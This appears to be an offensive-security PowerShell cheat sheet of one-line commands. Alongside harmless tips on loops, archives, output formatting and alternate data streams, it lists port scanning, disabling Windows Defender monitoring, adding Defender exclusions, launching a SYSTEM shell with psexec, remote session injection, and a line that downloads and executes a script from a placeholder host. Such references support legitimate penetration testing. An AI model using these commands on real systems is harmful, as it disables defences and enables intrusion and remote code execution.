Compact loop

1,2,3,4 | % {write-host $_}

Scan selected ports

22,53,80,443,445 | % { Test-Connection -ComputerName <ip> -Port $_ }


Expand-Archive <>
Add-Type -assembly 'system.io.compression.filesystem';[io.compression.zipfile]::ExtractToDirectory("<archive path>","<target dir>")

Check for hidden streams

Get-Item -Stream * <path>

Disable Windows Defender

powershell.exe -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $true

Add Defender Exception

Add-MpPreference -ExclusionPath <path>

Check for Constrained Language Mode


Inject .ps1 into session

Invoke-Command -FilePath <script> -Sessions $sessions
Enter-PSSession -Session $sess

Run cmd.exe as SYSTEM

psexec.exe -i -s %SystemRoot%\system32\cmd.exe

File Transfer & Execution

iex(iwr http://<ip>/x.ps1 -usebasicparsing)

Prevent Output Truncation

| Ft -autosize -wrap
| fl

Encrypt files

# https://gallery.technet.microsoft.com/scriptcenter/EncryptDecrypt-files-use-65e7ae5d
$key = New-CryptographyKey -Algorithm AES  
# Encrypt the file 
Protect-File '.\secrets.txt' -Algorithm AES -Key $key -RemoveSource 
# Decrypt the file 
Unprotect-File '.\secrets.txt.AES' -Algorithm AES -Key $key -RemoveSource

Alternate Data Stream (ADS)

powershell -command "get-item <file> -stream *"
powershell -command "get-content <file> -stream root.txt"

Last updated